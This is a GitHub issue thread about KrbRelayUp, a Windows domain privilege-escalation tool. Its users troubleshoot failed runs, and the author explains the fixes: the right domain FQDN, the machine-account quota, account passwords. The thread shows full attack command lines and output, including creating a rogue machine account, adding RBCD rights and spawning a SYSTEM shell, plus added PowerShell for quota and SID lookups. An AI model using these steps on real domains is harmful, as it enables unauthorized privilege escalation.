Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

Could not find computer account SID: #3

Open dreizehnutters opened 2 years ago

dreizehnutters commented 2 years ago

Hey,

I just tried the PoC for a customer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 client. LDAP signing is disabled.

(screenshot: KrbRelayUp_fail)

0xBrAinsTorM commented 2 years ago

Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)

PyroChiliarch commented 2 years ago

I had this issue, started working after a reboot.

qiminghe commented 2 years ago

Same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com; I tried the following, and neither works:

```
KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[+] Computer account "evilhost$" added with password "pass0123"
[-] Could not find computer account SID:
[-] Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
```

```
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[-] Could not add new computer account:
[-] The user has insufficient access rights.
```

Help?

Dec0ne commented 2 years ago

> Same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com; I tried the following, and neither works:
>
> ```
> KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
> [+] Computer account "evilhost$" added with password "pass0123"
> [-] Could not find computer account SID:
> [-] Index was out of range. Must be non-negative and less than the size of the collection.
> Parameter name: index
> ```
>
> ```
> KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
> [-] Could not add new computer account:
> [-] The user has insufficient access rights.
> ```
>
> Help?

In the first command your domain was incorrect, so it couldn't find the SID of the new computer in that domain (because it doesn't exist there); this is why it failed. In the second command the domain flag was correct, but it couldn't add the "evilhost$" computer because it already exists (it was added in the first command). Try either removing -CreateNewComputerAccount from the second command or specifying a new -ComputerName:

In the next version (should be out this week) the tool will look up the domain by itself, so this kind of confusion will be less likely to happen again.
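As an added example (not code from KrbRelayUp or from anyone in this thread), the following PowerShell shows the two checks behind the explanation above: reading the FQDN of the domain the host is actually joined to (the value -Domain expects), and then looking up a machine account in that domain and reading its SID, which is the step that fails with "Could not find computer account SID" when the wrong domain is queried. It uses only System.DirectoryServices, so it runs on a domain-joined Windows 10 client without RSAT. The account name `evilhost$` is taken from the thread as a placeholder, and `Get-MachineAccountSid` is a hypothetical helper name.

```powershell
# Added example, not code from KrbRelayUp or any participant in this thread.
# Uses only System.DirectoryServices, so it runs on a domain-joined Windows 10
# client without RSAT. 'evilhost$' is a placeholder taken from the thread.

# 1. The value to pass as -Domain / -d is the FQDN of the domain the host is
#    actually joined to. Read it from the machine's membership instead of
#    guessing '<hostname>.local', which is what produced the SID failure above.
$joined = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain()
"Joined domain FQDN: $($joined.Name)"          # e.g. mycompany.com

# 2. Confirm the machine account exists in that domain and read its SID.
#    Hypothetical helper name; the LDAP filter and attribute names are standard AD.
function Get-MachineAccountSid {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,   # e.g. 'evilhost$'
        [Parameter(Mandatory)][string]$DomainFqdn        # e.g. 'mycompany.com'
    )
    # Serverless bind: ADSI locates a DC for the given DNS domain name.
    $root     = [ADSI]"LDAP://$DomainFqdn"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = "(&(objectCategory=computer)(sAMAccountName=$($SamAccountName)))"
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('objectSid', 'distinguishedName'))

    $hit = $searcher.FindOne()
    if ($null -eq $hit) {
        # This is the situation behind "Could not find computer account SID":
        # the account is not present in the domain that was queried.
        throw "No computer account '$SamAccountName' found in $DomainFqdn"
    }

    # objectSid comes back as raw bytes; convert to a SecurityIdentifier.
    $sid = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$hit.Properties['objectsid'][0], 0)
    [pscustomobject]@{
        SamAccountName    = $SamAccountName
        DistinguishedName = $hit.Properties['distinguishedname'][0]
        Sid               = $sid.Value
    }
}

# Look up the account created by the earlier run, in the correct domain.
Get-MachineAccountSid -SamAccountName 'evilhost$' -DomainFqdn $joined.Name
```

Running the lookup with the same wrong value the first command used (`-DomainFqdn 'laptop123.local'`) fails at the bind or returns no object, which is the same condition the tool reports; running it with the joined domain's FQDN returns the object and its SID.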

qiminghe commented 2 years ago

Tried two revisions, getting the same error:

```
[-] Could not add new computer account:
[-] The user has insufficient access rights.
```

Do I have to be a Windows local admin (run as admin) for the command? Tried that, does not help either. Any debug/log option I can turn on for troubleshooting?

Regarding domain lookup, is it just:

```
PS> systeminfo | Select-String 'Domain'
```

which I used here.

qiminghe commented 2 years ago

I pulled the latest and re-ran the executable and noticed the following option disappearing: -c (--CreateNewComputerAccount). Assuming I am running the executable from the existing laptop123 I own:

```
.\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell: ./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123
```

However, when running the last suggested command, I am getting the following error:

```
KrbRelayUp - Relaying you to SYSTEM
[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
```

Do I have to do anything about the laptop's firewall? I can verify AD server ports 389/88 are all open. Anything else I need to check?

Dec0ne commented 2 years ago

`[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED` means that the password specified for the laptop123$ machine account is incorrect.

The -cn and -cp flags are for the separate machine account you own, or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from).

Run those two commands and it should work:

qiminghe commented 2 years ago

When running the following command to create a new computer account (-c):

```
.\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
```

I fall back to the old error below (still not sure what is causing the problem without debug/logs):

```
KrbRelayUp - Relaying you to SYSTEM
[-] Could not add new computer account:
[-] The user has insufficient access rights.
```

Dec0ne commented 2 years ago

Insufficient privileges to add a computer account is usually due to either a restriction in the domain where regular users are not allowed to add a new machine account (this is actually one of the mitigation suggestions for this attack) or because your user has reached the maximum quota of new computer accounts it may add, which is 10 by default (this is my guess for your specific issue). You can either delete, via a domain admin from the DC, all of the computer accounts you've added, which will reset your user's quota so you can perform the attack again, or use another domain user to perform the attack with.

qiminghe commented 2 years ago

I verified:

  1. AD ldap:// is bindable on 389, assuming LDAP signing is NOT enforced (default).
  2. Queried 'ms-DS-MachineAccountQuota', which is 10 (default), as follows:

     ```
     PS> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
     DistinguishedName         : DC=xxx,DC=xxx,DC=xxx,DC=xxx
     ms-DS-MachineAccountQuota : 10
     Name                      : corp
     ObjectClass               : domainDNS
     ObjectGUID                : xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
     ```

How do I query AD to see if I have reached my quota? I have seen the following error 10+ times though:

```
[+] Computer account "evilhost$" added with password xxxx
[-] Could not find computer account SID:
```

Does this mean 'evilhost' was successfully added? If so, how do I AD-query for it? The Windows machine running the script has the full DN:

```
CN=laptop123,OU=xxx,OU=xxx,DC=xxx,DC=xxx,DC=xxx,DC=xxx
```

Do I have to provide KrbRelayUp with the full DN, like -cn CN=evilhost,OU=xxx,...? Please advise. Thx

Dec0ne commented 2 years ago

Could you check the previous commands using a new low-priv user (which probably still hasn't reached its ms-DS-MachineAccountQuota limit)? Another route you could take is logging in to your DC as a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs; this will let your user add new machine accounts again.
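As an added example (not part of KrbRelayUp or this thread), the following PowerShell answers the question asked above of how to tell from AD whether a user has used up ms-DS-MachineAccountQuota, and shows the domain-admin side of the last two replies: deleting the computer objects that user created to reset its usage, or setting the quota to 0, the mitigation referred to earlier in the thread. It assumes the RSAT ActiveDirectory module in a domain-joined session; the administrative commands are left commented out because they change the domain.

```powershell
# Added example, not code from KrbRelayUp or any participant in this thread.
# Assumes the RSAT ActiveDirectory module and a domain-joined session.

Import-Module ActiveDirectory

$domain = Get-ADDomain
$maq = (Get-ADObject -Identity $domain.DistinguishedName `
        -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

# When a user without explicit Create-Computer rights on the container adds a
# machine account, the DC stamps the creator's SID into mS-DS-CreatorSID on the
# new object and counts such objects against that user's quota. Listing them
# shows how much of the quota is used and which objects a DA would delete to
# reset it. (Users with explicit create rights are not subject to the quota.)
$mySid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value

$created = @(
    Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties 'mS-DS-CreatorSID' |
    Where-Object {
        # mS-DS-CreatorSID is returned as raw bytes; compare as a SID string.
        $creator = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$_.'mS-DS-CreatorSID', 0)
        $creator.Value -eq $mySid
    }
)

"ms-DS-MachineAccountQuota = $maq"
"Computer objects created by $($env:USERDOMAIN)\$($env:USERNAME): $($created.Count)"
$created | Select-Object Name, DistinguishedName

if ($created.Count -ge $maq) {
    "Quota exhausted: a further add (e.g. KrbRelayUp -c) is refused with 'insufficient access rights'."
}

# --- Domain-admin side (run as a DA; commented out because both change the domain) ---
# Reset this user's quota usage by deleting the objects it created:
#   $created | Remove-ADComputer -Confirm:$false
# Or stop regular users from adding machine accounts at all (the mitigation
# mentioned earlier in the thread):
#   Set-ADDomain -Identity $domain.DistinguishedName -Replace @{'ms-DS-MachineAccountQuota' = 0}
```

Run the first part as the low-privileged user whose adds are failing; if the count equals the quota, the "insufficient access rights" result is the quota, not LDAP signing or a firewall. The `Where-Object` filter compares SIDs on the client because the AD module has no built-in way to filter on a binary SID value server-side without escaping the bytes by hand.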